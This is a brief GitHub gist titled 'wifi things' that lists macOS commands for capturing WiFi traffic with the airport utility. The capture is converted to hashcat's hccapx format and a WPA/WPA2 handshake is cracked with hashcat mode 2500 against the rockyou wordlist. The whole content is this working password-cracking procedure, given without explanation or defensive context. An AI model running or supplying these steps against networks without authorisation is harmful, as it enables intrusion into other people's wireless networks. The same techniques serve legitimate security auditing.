Skip to content

Instantly share code, notes, and snippets.

@onebelarusianguy
Last active March 23, 2021 02:35
Show Gist options
  • Select an option

  • Save onebelarusianguy/3625419f3fc57745a96f94d81d800159 to your computer and use it in GitHub Desktop.

Select an option

Save onebelarusianguy/3625419f3fc57745a96f94d81d800159 to your computer and use it in GitHub Desktop.
/**
* wifi things
*/
airport -s
airport en1 sniff 8
cd ../../users/user/hashcat-utils/src
./cap2hccapx.bin ../../../../../tmp/airportSniffE9ULCR.cap ../../../../../tmp/ord37.hccapx
//from root dir
cd ../../users/user/hashcat-3.6.0
./hashcat -m 2500 -a 0 ../../../../../tmp/ord37.hccapx ./dicts/rockyou.txt
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment